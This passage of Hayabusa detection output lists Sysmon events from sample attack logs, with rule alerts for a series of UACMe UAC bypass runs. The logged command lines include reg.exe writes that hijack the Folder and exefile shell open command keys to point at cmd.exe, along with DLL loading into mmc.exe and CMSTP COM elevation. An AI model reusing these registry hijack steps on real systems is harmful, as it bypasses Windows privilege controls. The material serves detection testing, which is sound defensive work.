C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 
747F3D96-9123-5D45-0000-001087596101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 
747F3D96-A356-5D45-0000-001029AA9901,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.508 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: 
Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.875 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 
+09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object 
Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:36.239 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Evas | 
PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: 
C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.267 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe 
add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.893 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.060 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 
